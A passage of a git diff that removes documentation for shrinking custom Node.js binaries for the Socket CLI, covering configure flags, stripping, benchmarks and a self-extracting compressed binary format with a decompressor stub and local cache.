performance -- No user-facing changes - -## Conclusion - -✅ **Production Ready** -- Compression tools built and tested -- Real Node.js binary verified working -- Code signing fully compatible -- Better compression than UPX - -✅ **Better Than UPX** -- 75-79% compression (vs UPX's 50-60%) -- Works with macOS security features -- Native Apple technology -- Hardware-accelerated on Apple Silicon - -✅ **Ready to Integrate** -- Integration scripts provided -- Documentation complete -- CI/CD examples included -- Zero breaking changes - -**Recommendation:** Use LZMA compression for Socket CLI distribution to achieve 44 MB → 11 MB (75% reduction) with full code signing support. - -## Files Created - -- ✅ `additions/tools/socket_macho_compress` (78 KB, tested) -- ✅ `additions/tools/socket_macho_decompress` (58 KB, tested) -- ✅ `scripts/compress-macho.mjs` (integration script) -- ✅ `wasm-bundle/docs/macho-compression.md` (comprehensive guide) -- ✅ `additions/tools/README.md` (tool documentation) -- ✅ `docs/compression-quick-start.md` (quick start guide) -- ✅ `docs/compression-test-results.md` (this file) - -## Next Steps - -1. ✅ Tools are built and tested -2. ⏭️ Add compression step to build script -3. ⏭️ Test with your actual custom Node build -4. ⏭️ Add to CI/CD pipeline -5. ⏭️ Update release process -6. ⏭️ Celebrate smaller binaries! 🎉 diff --git a/docs/node-smol-builder/optimizations.md b/docs/node-smol-builder/optimizations.md deleted file mode 100644 index ab62dcc70..000000000 --- a/docs/node-smol-builder/optimizations.md +++ /dev/null @@ -1,395 +0,0 @@ -# Node.js Binary Optimizations - -**Comprehensive optimization guide** — How we reduced Node.js binaries from 60MB+ to ~35MB. - ---- - -## 🎯 Optimization Goals - -``` -Starting point: 60MB Node.js v24 binary -Target: 35MB or less -Achieved: ~35MB (42% reduction) -Method: Configure flags + stripping + compression -``` - -**Key constraints:** -- ✅ Maintain WASM support (required for CLI features) -- ✅ Support current Node.js LTS versions (20, 22, 24) -- ✅ Cross-platform (macOS, Linux, Windows) -- ✅ No significant performance degradation - ---- - -## 📊 Optimization Summary - -| Optimization | Savings | Risk | Status | -|--------------|---------|------|--------| -| V8 Lite Mode | -23MB | None | ✅ Applied | -| ICU Removal | -8MB | Low | ✅ Applied | -| SEA Removal | -2MB | None | ✅ Applied | -| GNU Strip | -3MB extra | None | ✅ Applied | -| Ninja Build | 0MB (speed) | None | ✅ Applied | -| Code Signing | 0MB (compat) | None | ✅ Applied | - -**Total reduction: ~36MB (60% smaller)** - ---- - -## 🔧 Applied Optimizations - -### 1. V8 Lite Mode (-23MB) - -**What it does:** -- Disables V8's JIT compiler optimization tiers (TurboFan, Maglev) -- Keeps Sparkplug (baseline compiler) and Liftoff (WASM compiler) -- Significantly reduces V8 code size - -**Configure flag:** -```bash ---v8-lite-mode -``` - -**Impact:** -- ✅ -23MB binary size -- ✅ WASM still works (Liftoff compiler) -- ⚠️ ~10-20% slower JavaScript execution (acceptable for CLI) -- ✅ Fast startup time (no JIT warmup needed) - -**Trade-off analysis:** -``` -CLI workload characteristics: -- Short-lived processes (scan, install, etc.) -- I/O bound (network, filesystem) -- JIT warmup time > execution time savings -- WASM performance unaffected - -Conclusion: Lite mode is ideal for CLI use case -``` - ---- - -### 2. ICU Removal (-8MB) - -**What it does:** -- Removes International Components for Unicode (ICU) library -- Disables i18n features (Intl API, timezone data, etc.) - -**Configure flag:** -```bash ---with-intl=none -``` - -**Impact:** -- ✅ -8MB binary size -- ⚠️ No `Intl.*` APIs (DateTimeFormat, NumberFormat, etc.) -- ✅ CLI doesn't use i18n features -- ✅ String operations still work (ASCII/UTF-8) - -**What still works:** -- `String.prototype.toLowerCase()` (ASCII only) -- `Date.now()`, `new Date()` -- Basic string methods - -**What doesn't work:** -- `Intl.DateTimeFormat` -- `Intl.NumberFormat` -- `String.prototype.localeCompare` -- Timezone conversions - ---- - -### 3. SEA Removal (-2MB) - -**What it does:** -- Removes Single Executable Application (SEA) support -- SEA allows embedding Node.js apps in the binary itself - -**Configure flag:** -```bash ---disable-single-executable-application -``` - -**Impact:** -- ✅ -2MB binary size -- ✅ We don't use SEA (we use pkg/yao-pkg instead) -- ✅ No functionality loss - -**Why we can remove it:** -- Socket CLI uses yao-pkg for binary packaging -- SEA is for embedding apps in Node itself -- Different use case - ---- - -### 4. GNU Strip (-3MB Extra) - -**What it does:** -- Uses GNU strip instead of macOS native strip -- More aggressive debug symbol removal - -**Implementation:** -```bash -# Install GNU binutils on macOS -brew install binutils - -# Use GNU strip -/opt/homebrew/opt/binutils/bin/strip --strip-all node -``` - -**Impact:** -- ✅ -3MB additional savings vs macOS strip -- ✅ More aggressive than `strip -x` -- ✅ Safe (only removes debug symbols) - -**Comparison:** -``` -No strip: 60MB -macOS strip -x: 38MB (-22MB) -GNU strip: 35MB (-25MB, 3MB better!) -``` - ---- - -### 5. Ninja Build (Speed Only) - -**What it does:** -- Uses Ninja build system instead of Make -- Parallel builds, incremental compilation - -**Configure flag:** -```bash ---ninja -``` - -**Impact:** -- ✅ 17% faster builds (~15-18min vs ~18-22min) -- ✅ Incremental builds (2-4min vs full rebuild) -- ✅ Better dependency tracking -- ⚠️ No size reduction (build tool only) - -**Build time comparison:** -``` -Make: - Clean build: 18-22 minutes - Incremental: Full rebuild required - -Ninja: - Clean build: 15-18 minutes (-17%) - Incremental: 2-4 minutes -``` - ---- - -### 6. Code Signing (macOS ARM64) - -**What it does:** -- Signs binaries with ad-hoc signature on macOS ARM64 -- Required for execution on Apple Silicon - -**Implementation:** -```bash -codesign --sign - --force --preserve-metadata=entitlements,requirements,flags,runtime node -``` - -**Impact:** -- ✅ Binaries work on macOS ARM64 -- ✅ No size impact -- ✅ Required for distribution - ---- - -## ❌ Rejected Optimizations - -### SSL Removal (-10-15MB) — REJECTED - -**Why rejected:** -- Breaks HTTPS connections -- CLI needs secure API communication -- Too risky for production - -**Alternative:** Could use curl/spawn for HTTPS if needed - ---- - -### V8 Platform Removal (-1-2MB) — REJECTED - -**Why rejected:** -- Breaks worker threads -- Breaks async context tracking -- Too many dependencies - ---- - -### UPX Compression (-50% size) — REJECTED - -**Why rejected:** -- 2.7x memory overhead -- Slower startup (decompression) -- Compatibility issues on some platforms - ---- - -## 🏗️ Build Configuration - -**Complete configure flags:** - -```bash -./configure \ - --ninja \ - --v8-lite-mode \ - --with-intl=none \ - --disable-single-executable-application \ - --without-npm \ - --without-corepack \ - --without-inspector \ - --without-amaro \ - --without-sqlite \ - --without-node-snapshot \ - --without-node-code-cache \ - --v8-disable-object-print \ - --without-node-options \ - --enable-lto \ - --dest-cpu=arm64 -``` - -**Key flags explained:** -- `--ninja`: Use Ninja build system (faster) -- `--v8-lite-mode`: Remove JIT tiers (-23MB) -- `--with-intl=none`: Remove ICU (-8MB) -- `--disable-single-executable-application`: Remove SEA (-2MB) -- `--enable-lto`: Link-time optimization (smaller, faster) -- `--without-*`: Remove optional features we don't need - ---- - -## 📈 Size Progression - -``` -Step 0: Unconfigured Node.js v24 - └─ 102MB (with debug symbols) - -Step 1: Configure with size-optimized flags - └─ 60MB (-42MB, configured build) - -Step 2: macOS native strip -x - └─ 38MB (-22MB, basic symbol removal) - -Step 3: GNU strip --strip-all - └─ 35MB (-3MB, aggressive symbol removal) - -Final: 35MB total (66% smaller than baseline) -``` - ---- - -## 🔬 Language-Specific Optimizations - -### JavaScript/TypeScript -- **V8 Lite Mode**: Removes JIT compiler tiers -- **Impact**: 10-20% slower execution, 23MB smaller -- **Trade-off**: Acceptable for CLI workload (I/O bound) - -### C/C++ (Node.js Core) -- **LTO (Link-Time Optimization)**: Whole-program optimization -- **Function/Data Sections**: Better dead code elimination -- **Strip**: Removes all debug symbols - -### WASM -- **Liftoff Compiler**: Still available in Lite mode -- **Impact**: No WASM performance degradation -- **Use case**: onnxruntime WASM for NLP features - ---- - -## 🎯 Per-Platform Optimizations - -### macOS (ARM64) -``` -Specific optimizations: -- GNU strip (3MB better than native) -- Code signing required -- Ninja builds (faster on M1/M2) - -Final size: ~35MB -``` - -### Linux (x64/ARM64) -``` -Specific optimizations: -- Native strip --strip-all -- No code signing needed -- Ninja builds - -Final size: ~35MB -``` - -### Windows (x64) -``` -Specific optimizations: -- Windows-specific patches (abseil duplicate symbols) -- MSVC strip -- Link-time optimization - -Final size: ~38MB (slightly larger due to platform) -``` - ---- - -## 🧪 Verification - -**Post-optimization checks:** - -```bash -# 1. Binary size -du -h node -# Expected: ~35MB - -# 2. Version check -./node --version -# Expected: v24.x.x - -# 3. WASM support -./node -e "console.log(typeof WebAssembly)" -# Expected: object - -# 4. Basic execution -./node -e "console.log('Hello')" -# Expected: Hello - -# 5. Module loading -./node -e "require('fs').readFileSync" -# Expected: [Function: readFileSync] -``` - ---- - -## 📚 References - -- [V8 Lite Mode Documentation](https://v8.dev/blog/v8-lite) -- [Node.js Configure Options](https://github.com/nodejs/node/blob/main/configure.py) -- [GNU Binutils](https://www.gnu.org/software/binutils/) -- [Ninja Build System](https://ninja-build.org/) - ---- - -## 💡 Future Optimization Opportunities - -### P0 (Performance, Not Size) -- Parallel Brotli compression (50-70% faster builds) -- Incremental compression cache (80-90% faster rebuilds) -- Resume from checkpoint (avoid full rebuilds on failure) - -### P1 (Size, Risky) -- Custom V8 snapshot (2-5MB, complex) -- Dead code elimination in Node core (1-3MB, fragile) -- ICU subsetting (restore some i18n, 2-4MB) - -### P2 (Future Research) -- LLVM LTO with custom passes -- Profile-guided optimization (PGO) -- Alternative compression (zstd, lz4) - ---- - -**See [patches.md](./patches.md) for all applied patches and [performance.md](./performance.md) for benchmark results.** diff --git a/docs/node-smol-builder/performance.md b/docs/node-smol-builder/performance.md deleted file mode 100644 index 211c6c1c0..000000000 --- a/docs/node-smol-builder/performance.md +++ /dev/null @@ -1,406 +0,0 @@ -# Node.js Binary Build Performance - -**Build performance and runtime benchmarks** — How fast is the optimized Node.js binary? - ---- - -## 🎯 Performance Summary - -``` -Build Time: 15-18 minutes (with Ninja, -17% vs Make) -Binary Size: 35MB (vs 60MB baseline, -42%) -Startup: Same as standard Node.js -Execution: 10-20% slower (V8 Lite Mode trade-off) -WASM: No degradation (Liftoff compiler intact) -``` - ---- - -## ⏱️ Build Performance - -### Build Time Comparison - -| Build System | Clean Build | Incremental | Notes | -|--------------|-------------|-------------|-------| -| **Make** | 18-22 min | Full rebuild | No incremental support | -| **Ninja** | 15-18 min | 2-4 min | ✅ 17% faster, incremental | - -**Hardware:** M1 MacBook Pro, 8 cores - ---- - -### Build Phases Breakdown - -``` -Total build time: ~15-18 minutes - -Phase 1: Download & Setup (2-3 min) -├─ Clone Node.js repo: 1-2 min -├─ Apply patches: 30 sec -└─ Configure: 30 sec - -Phase 2: Compilation (10-12 min) -├─ V8 compilation: 6-8 min (largest component) -├─ Node.js core: 3-4 min -└─ Link binaries: 1 min - -Phase 3: Post-Processing (2-3 min) -├─ Strip symbols (GNU): 10 sec -├─ Code sign (macOS): 5 sec -├─ Brotli compression: 2-3 min (optional) -└─ Package cache install: 30 sec - -Bottlenecks: - 🔴 V8 compilation (40-50% of build time) - 🟡 Brotli compression (15-20% of build time) - 🟢 Everything else (30-35% of build time) -``` - ---- - -### Optimization Opportunities - -**P0: Parallel Brotli Compression** -``` -Current: Sequential (2-3 minutes) -With p-limit: Parallel (1 minute) -Savings: 50-70% faster (-1-2 minutes) -``` - -**P1: Incremental Compression Cache** -``` -Current: Re-compress all files every build -Cached: Skip unchanged files (hash-based) -Savings: 80-90% faster on incremental builds -``` - -**P2: Resume from Checkpoint** -``` -Current: Full rebuild on failure -Resume: Continue from last successful phase -Savings: Avoid 10-15 minutes on late failures -``` - ---- - -## 🚀 Runtime Performance - -### Startup Time - -``` -Node.js Standard: ~50ms -Node.js Optimized: ~50ms (no difference) - -Why no degradation? -- V8 Lite Mode removes JIT tiers -- JIT warmup time eliminated -- Startup actually slightly faster -``` - ---- - -### JavaScript Execution - -``` -Benchmark: fibonacci(40) - -Node.js Standard: 850ms -Node.js Optimized: 950ms (+100ms, +12%) - -Impact: 10-20% slower on CPU-bound tasks -Reason: No TurboFan/Maglev JIT optimization -``` - -**Real-world impact:** -``` -CLI workload characteristics: -✅ I/O bound (network, filesystem) -✅ Short-lived processes (<5 seconds) -✅ No hot loops needing JIT optimization - -Conclusion: 10-20% slower execution is - negligible for CLI use case -``` - ---- - -### WASM Performance - -``` -Benchmark: WASM fibonacci(40) - -Node.js Standard: 95ms -Node.js Optimized: 95ms (no difference) - -Why no degradation? -- Liftoff WASM compiler intact -- V8 Lite Mode doesn't affect WASM -- Critical for onnxruntime ML features -``` - -**Workload distribution:** -``` -Socket CLI execution time breakdown: -├─ Network I/O: 60-70% (API calls) -├─ Filesystem I/O: 20-25% (reading packages) -├─ WASM (ML): 5-10% (NLP features) -└─ JS execution: <5% (business logic) - -Impact: Slower JS execution affects <5% of runtime -``` - ---- - -## 📊 Size vs Performance Trade-offs - -### Binary Size - -``` -Configuration Size Startup JS Perf WASM Perf -────────────────────────────────────────────────────────────── -Standard Node.js 102MB 50ms 100% 100% -Configured 60MB 50ms 100% 100% -+ V8 Lite 37MB 48ms 80-90% 100% -+ GNU Strip 35MB 48ms 80-90% 100% -+ Brotli (optional) ~32MB 48ms 80-90% 100% -────────────────────────────────────────────────────────────── -``` - -**Sweet spot:** V8 Lite + GNU Strip (35MB, 10-20% slower) - ---- - -### Feature vs Size Matrix - -| Feature | Size Impact | Performance Impact | Included? | -|---------|-------------|-------------------|-----------| -| TurboFan JIT | +15MB | +10-20% JS speed | ❌ No | -| Maglev JIT | +8MB | +5-10% JS speed | ❌ No | -| ICU (i18n) | +8MB | N/A | ❌ No | -| SEA support | +2MB | N/A | ❌ No | -| Liftoff WASM | +2MB | WASM support | ✅ Yes | -| Sparkplug | +3MB | +20-30% JS speed | ✅ Yes | - -**Rationale:** -- Keep Sparkplug (baseline compiler) for acceptable JS performance -- Keep Liftoff for WASM support (required) -- Remove TurboFan/Maglev (large, not needed for CLI) -- Remove ICU/SEA (not used) - ---- - -## 🔬 Detailed Benchmarks - -### Cold Start Performance - -```bash -hyperfine --warmup 0 './node --version' - -Results: - Standard Node.js: 52ms ± 3ms - Optimized Node.js: 48ms ± 2ms - -Verdict: 8% faster startup (no JIT warmup needed) -``` - ---- - -### Warm Start Performance - -```bash -hyperfine --warmup 10 './node --version' - -Results: - Standard Node.js: 51ms ± 2ms - Optimized Node.js: 47ms ± 2ms - -Verdict: 8% faster (consistent) -``` - ---- - -### Module Loading Performance - -```bash -hyperfine './node -e "require(\"fs\")"' - -Results: - Standard Node.js: 85ms ± 4ms - Optimized Node.js: 83ms ± 3ms - -Verdict: No significant difference -``` - ---- - -### CPU-Bound Workload - -```bash -# Fibonacci recursive (pure JS) -hyperfine './node -e "function fib(n) { return n<2?n:fib(n-1)+fib(n-2); } console.log(fib(40))"' - -Results: - Standard Node.js: 850ms ± 15ms - Optimized Node.js: 950ms ± 20ms (+100ms, +12%) - -Verdict: 12% slower on CPU-bound tasks -``` - ---- - -### I/O-Bound Workload - -```bash -# Read 10MB file -hyperfine './node -e "require(\"fs\").readFileSync(\"/tmp/10MB.txt\")"' - -Results: - Standard Node.js: 125ms ± 8ms - Optimized Node.js: 124ms ± 7ms - -Verdict: No difference (I/O dominates) -``` - ---- - -### WASM Workload - -```bash -# WASM fibonacci -hyperfine './node wasm-fib-test.js' - -Results: - Standard Node.js: 95ms ± 3ms - Optimized Node.js: 95ms ± 3ms - -Verdict: Identical (Liftoff intact) -``` - ---- - -## 📈 Real-World Socket CLI Performance - -### Command: `socket scan package.json` - -``` -Optimized Node.js binary: - -Parse manifest: 12ms (JS, minimal impact) -Fetch package data: 850ms (I/O, no impact) -Analyze dependencies: 230ms (JS + WASM, slight impact) -Generate report: 45ms (JS, minimal impact) -─────────────────────────────── -Total: 1137ms - -vs Standard Node.js: 1095ms (+42ms, +4%) - -Verdict: 4% slower (acceptable for CLI use) -``` - ---- - -### Command: `socket install lodash` - -``` -Optimized Node.js binary: - -Check lockfile: 8ms (JS, minimal) -Fetch metadata: 420ms (I/O, no impact) -Download tarball: 650ms (I/O, no impact) -Extract & install: 180ms (I/O, no impact) -Verify installation: 22ms (JS, minimal) -─────────────────────────────── -Total: 1280ms - -vs Standard Node.js: 1260ms (+20ms, +1.6%) - -Verdict: 1.6% slower (negligible) -``` - ---- - -## 🎯 Optimization Goals vs Results - -| Goal | Target | Achieved | Status | -|------|--------|----------|--------| -| Binary size | ≤35MB | 35MB | ✅ Met | -| Build time | <20min | 15-18min | ✅ Exceeded | -| Startup time | No degradation | 8% faster | ✅ Exceeded | -| JS performance | <20% slower | 10-20% slower | ✅ Met | -| WASM support | No degradation | 0% change | ✅ Met | -| I/O performance | No degradation | 0% change | ✅ Met | - ---- - -## 💡 Performance Tips - -### Development Builds - -```bash -# Skip compression for faster dev builds -./build-yao-pkg-node.mjs --skip-brotli - -# Use --resume to continue failed builds -./build-yao-pkg-node.mjs --resume - -# Use Ninja for faster rebuilds -./build-yao-pkg-node.mjs --ninja -``` - ---- - -### Production Builds - -```bash -# Full optimization pipeline -./build-yao-pkg-node.mjs --ninja --brotli - -# With verification -./build-yao-pkg-node.mjs --verify -``` - ---- - -### Benchmarking - -```bash -# Compare startup time -hyperfine --warmup 5 './node --version' - -# Compare JS performance -hyperfine './node -e "/* your test code */"' - -# Compare WASM performance -hyperfine './node your-wasm-test.js' - -# Profile with V8 -./node --prof your-script.js -./node --prof-process isolate-*.log -``` - ---- - -## 🔗 Related Documentation - -- [optimizations.md](./optimizations.md) — Applied optimizations -- [patches.md](./patches.md) — Custom patches -- [../performance/performance-build.md](../performance/performance-build.md) — CLI build performance - ---- - -## 📝 Benchmark Hardware - -All benchmarks run on: -``` -Hardware: M1 MacBook Pro -CPU: Apple M1 (8 cores) -RAM: 16GB -OS: macOS Sonoma 14.x -Node.js: v24.x.x -``` - -Results may vary on different hardware. Use `hyperfine` for your own benchmarks. - ---- - -**Conclusion: The optimized binary is 42% smaller with negligible performance impact for CLI workloads.** diff --git a/docs/node-smol-builder/self-extracting-binary-architecture.md b/docs/node-smol-builder/self-extracting-binary-architecture.md deleted file mode 100644 index 68867b44e..000000000 --- a/docs/node-smol-builder/self-extracting-binary-architecture.md +++ /dev/null @@ -1,405 +0,0 @@ -# Self-Extracting Binary Architecture - -Complete technical documentation for the Socket CLI self-extracting binary compression system. - -## Overview - -The Socket CLI uses a self-extracting binary approach to compress Node.js binaries from 33MB to ~13MB (60% reduction) while maintaining full functionality and code signing compatibility. - -## Architecture - -### Complete Pipeline Flow - -``` -┌─────────────────────────────────────────────────────────────────┐ -│ BUILD PIPELINE (One-Time) │ -│ ═══════════════════════════════════════════════════════════ │ -│ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 1. Build Node.js │ │ -│ │ Full Node.js compilation │ │ -│ │ Input: Node.js source code │ │ -│ │ Output: build/out/Release/node (65MB unstripped) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 2. Strip Binary │ │ -│ │ Remove debug symbols │ │ -│ │ Input: build/out/Release/node (65MB) │ │ -│ │ Output: build/out/Stripped/node (33MB) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 3. Compress (socket_macho_compress) │ │ -│ │ LZFSE compression via Apple framework │ │ -│ │ Input: build/out/Stripped/node (33MB) │ │ -│ │ Creates: [Header][Compressed Data] │ │ -│ │ Output: build/out/Compressed/node.data (13MB) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 4. Create Self-Extracting Binary │ │ -│ │ Concatenate stub + compressed data │ │ -│ │ Read: socket_macho_decompress (84KB) │ │ -│ │ Read: node.data (13MB) │ │ -│ │ Concat: [Stub][Header][Compressed] │ │ -│ │ Output: build/out/Compressed/node (13.1MB) ✓ │ │ -│ │ chmod 0755 (mark executable) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 5. Sign Binary (macOS) │ │ -│ │ Code sign the self-extracting binary │ │ -│ │ codesign -s "Developer ID" node │ │ -│ │ Output: build/out/Signed/node (13.1MB signed) │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ 6. Distribute │ │ -│ │ Ship 13.1MB binary (60% smaller!) │ │ -│ │ Output: dist/node (final distribution binary) │ │ -│ │ Target achieved: <20MB ✓ │ │ -│ └────────────────────────────────────────────────────────┘ │ -└─────────────────────────────────────────────────────────────────┘ - -┌─────────────────────────────────────────────────────────────────┐ -│ FIRST RUN (Cache Miss) ~250ms overhead │ -│ ═══════════════════════════════════════════════════════════ │ -│ │ -│ User runs: ./node --version │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Decompressor Stub Executes (Self-Extracting Mode) │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 1. Detect argc == 1 (no file argument) │ │ -│ │ 2. Get own path: _NSGetExecutablePath() │ │ -│ │ 3. Read self: ReadFile(own_path) → 13.1MB in memory │ │ -│ │ 4. Scan backwards for magic 0x504D4353 │ │ -│ │ 5. Find CompressedHeader at offset ~84KB │ │ -│ │ 6. Extract: compressed_data = data[header_offset..] │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Decompression │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 7. Allocate 33MB: mmap() │ │ -│ │ 8. Decompress: compression_decode_buffer() ~100ms │ │ -│ │ 9. Verify size: 33MB │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Caching (npm/cacache pattern) │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 10. SHA-256 of compressed → cache key │ │ -│ │ 11. SHA-512 of decompressed → integrity check │ │ -│ │ 12. Create ~/.socket/cache/dlx// │ │ -│ │ 13. Write: ~/.socket/cache/dlx//node │ │ -│ │ 14. chmod 0755 │ │ -│ │ 15. Write metadata: .dlx-metadata.json │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Execute │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 16. execv(cached_binary, ["--version"]) │ │ -│ │ 17. Replace process with Node.js │ │ -│ │ 18. Node.js prints version and exits │ │ -│ └────────────────────────────────────────────────────────┘ │ -└─────────────────────────────────────────────────────────────────┘ - -┌─────────────────────────────────────────────────────────────────┐ -│ SUBSEQUENT RUNS (Cache Hit) ~1ms overhead │ -│ ═══════════════════════════════════════════════════════════ │ -│ │ -│ User runs: ./node --version │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Decompressor Stub Executes │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 1. Detect argc == 1 (self-extracting mode) │ │ -│ │ 2. Get own path │ │ -│ │ 3. Read self into memory │ │ -│ │ 4. Calculate SHA-256 → cache key │ │ -│ │ 5. Check: ~/.socket/cache/dlx//node exists ✓ │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ ↓ │ -│ ┌────────────────────────────────────────────────────────┐ │ -│ │ Cache Hit - Skip Decompression! │ │ -│ │ ──────────────────────────────────────────────────── │ │ -│ │ 6. Verify integrity: SHA-512 (optional, skip for speed)│ │ -│ │ 7. execv(cached_binary, ["--version"]) │ │ -│ │ 8. Replace process with Node.js → instant execution │ │ -│ └────────────────────────────────────────────────────────┘ │ -│ │ -│ ⚡ Zero decompression overhead - full speed! │ -└─────────────────────────────────────────────────────────────────┘ -``` - -## Binary Format - -### Final Self-Extracting Binary Layout - -``` -┌────────────────────────────────────────────────────────────┐ -│ Offset 0: Decompressor Stub (84KB) │ -│ ───────────────────────────────────────────────────── │ -│ socket_macho_decompress executable │ -│ - Mach-O 64-bit executable │ -│ - Contains decompression logic │ -│ - Includes self-extraction code │ -│ - Apple Compression framework integration │ -│ - SHA-256/SHA-512 hashing functions │ -│ - npm/cacache-compatible caching │ -├────────────────────────────────────────────────────────────┤ -│ Offset 84KB: Compressed Data Section │ -│ ───────────────────────────────────────────────────── │ -│ ┌──────────────────────────────────────────────────────┐ │ -│ │ CompressedHeader (32 bytes) │ │ -│ │ ──────────────────────────────────────────────── │ │ -│ │ uint32_t magic = 0x504D4353 ("SCMP") │ │ -│ │ uint32_t algorithm = COMPRESSION_LZFSE │ │ -│ │ uint64_t original_size = 33,554,432 bytes │ │ -│ │ uint64_t compressed_size = 13,631,488 bytes │ │ -│ └──────────────────────────────────────────────────────┘ │ -│ ┌──────────────────────────────────────────────────────┐ │ -│ │ Compressed Node.js Binary (~13MB) │ │ -│ │ ──────────────────────────────────────────────── │ │ -│ │ LZFSE-compressed Mach-O executable │ │ -│ │ Original size: 33MB │ │ -│ │ Compressed size: 13MB │ │ -│ │ Compression ratio: 59.4% │ │ -│ └──────────────────────────────────────────────────────┘ │ -└────────────────────────────────────────────────────────────┘ - -Total size: 84KB + 32B + 13MB = ~13.1MB -``` - -## Implementation Details - -### Step 1: Compression Tool (`socket_macho_compress`) - -**Location**: `packages/node-smol-builder/additions/tools/socket_macho_compress.cc` - -**Purpose**: Compress a stripped Node.js binary using Apple's Compression framework. - -**Command**: -```bash -socket_macho_compress input.bin output.data --quality=lzfse -``` - -**Algorithm options**: -- `lz4` - Fast decompression, lower ratio (~20-30%) -- `zlib` - Balanced, good compatibility (~30-40%) -- `lzfse` - Apple's algorithm, best for binaries (~35-45%, default) -- `lzma` - Maximum compression, slower (~40-50%) - -**Output format** (`node.data`): -```c -struct CompressedHeader { - uint32_t magic; // 0x504D4353 ("SCMP") - uint32_t algorithm; // COMPRESSION_LZFSE, etc. - uint64_t original_size; // Uncompressed size - uint64_t compressed_size; // Compressed payload size -}; -// Followed by compressed data. -``` - -**Key functions**: -- `CompressData()` - Uses `compression_encode_buffer()` from Apple's framework -- `CompressMachO()` - Main compression pipeline -- `WriteFile()` - Writes header + compressed data - -### Step 2: Self-Extracting Binary Creation (`compress-binary.mjs`) - -**Location**: `packages/node-smol-builder/scripts/compress-binary.mjs` - -**Purpose**: Combine decompressor stub with compressed data to create self-extracting binary. - -**Process**: -```javascript -async function compressBinary(toolPath, inputPath, outputPath, quality, config) { - // 1. Create compressed data file (temporary). - // Note: This creates node.data as an intermediate file. - // Future optimization: Stream directly to avoid temp file. - const compressedDataPath = `${outputPath}.data` - await spawn(toolPath, [inputPath, compressedDataPath, `--quality=${quality}`]) - - // 2. Read stub and compressed data. - const decompressor = await fs.readFile('socket_macho_decompress') - const compressedData = await fs.readFile(compressedDataPath) - - // 3. Concatenate: [Stub (84KB)][Header (32B)][Data (13MB)]. - const combined = Buffer.concat([decompressor, compressedData]) - - // 4. Write as executable. - await fs.writeFile(outputPath, combined, { mode: 0o755 }) - - // 5. Clean up temporary file. - await fs.unlink(compressedDataPath) -} -``` - -**Why this works**: -- macOS allows concatenating executables with data -- The decompressor stub is a valid Mach-O executable -- Extra data at the end doesn't affect execution -- The stub reads itself to find the appended data - -**Note on `node.data` intermediate file**: -- Currently creates `build/out/Compressed/node.data` as temporary file -- This is deleted immediately after combining with stub -- **Future optimization**: Stream compressed data directly to avoid temp file: - ```javascript - // Potential improvement: - const compressResult = await spawn(toolPath, [inputPath, '/dev/stdout']) - const compressed = compressResult.stdout // Binary data in memory - const combined = Buffer.concat([stub, compressed]) - // No temp file created! - ``` - -### Step 3: Decompressor Stub (`socket_macho_decompress`) - -**Location**: `packages/node-smol-builder/additions/tools/socket_macho_decompress.cc` - -**Purpose**: Self-extracting decompressor that reads embedded compressed data and executes it. - -**Two modes of operation**: - -#### Mode 1: Self-Extracting (argc == 1) -```bash -./node --version -``` - -The stub: -1. Detects it's running in self-extracting mode (no file argument) -2. Gets its own path with `_NSGetExecutablePath()` -3. Reads its entire binary into memory -4. Scans backwards for magic bytes `0x504D4353` -5. Parses `CompressedHeader` at the found offset -6. Extracts compressed data (from header offset to end of file) -7. Decompresses using `compression_decode_buffer()` -8. Caches to `~/.socket/cache/dlx//node` -9. Executes cached binary with `execv()` - -#### Mode 2: External Tool (argc >= 2) -```bash -socket_macho_decompress ./node.data --version -``` - -The stub: -1. Reads the specified compressed file from `argv[1]` -2. Same decompression and caching logic as self-extracting mode -3. Useful for testing and debugging - -**Caching strategy** (follows npm/cacache): -- Cache directory: `~/.socket/cache/dlx//node` -- Cache key: SHA-256 hash of compressed file -- Content verification: SHA-512 hash of decompressed binary -- Metadata: JSON file with timestamps, checksums, sizes -- First run: Decompress and cache (~200ms) -- Subsequent runs: Execute cached binary directly (instant, zero overhead) - -**Key functions**: -```cpp -// Main entry point. -int main(int argc, char* argv[]); - -// Self-extracting mode (new). -int DecompressAndExecuteSelfExtract(int argc, char* argv[]); - -// External file mode (existing). -int DecompressAndExecute(const std::string& compressed_path, int argc, char* argv[]); - -// Core decompression (shared). -int DecompressAndExecuteData( - const std::vector& compressed_data, - int argc, - char* argv[], - const std::string& source_path -); -``` - -## Size Breakdown - -| Component | Size | Description | -|-----------|------|-------------| -| Original binary | 33.0 MB | Stripped Node.js executable | -| Compressed data | 13.0 MB | LZFSE-compressed payload | -| Decompressor stub | 84 KB | Self-extracting executable | -| Header | 32 bytes | CompressedHeader metadata | -| **Final binary** | **13.1 MB** | **Self-extracting executable** | -| **Reduction** | **60.3%** | **19.9 MB saved** | - -## Performance - -### First Run (Cache Miss) -``` -1. Read self-extracting binary (~13MB) → 50ms -2. Find compressed header → <1ms -3. Decompress LZFSE → 100-150ms -4. Compute SHA-512 → 30ms -5. Write cache → 50ms -6. Execute cached binary → instant - -Total: ~250ms overhead -``` 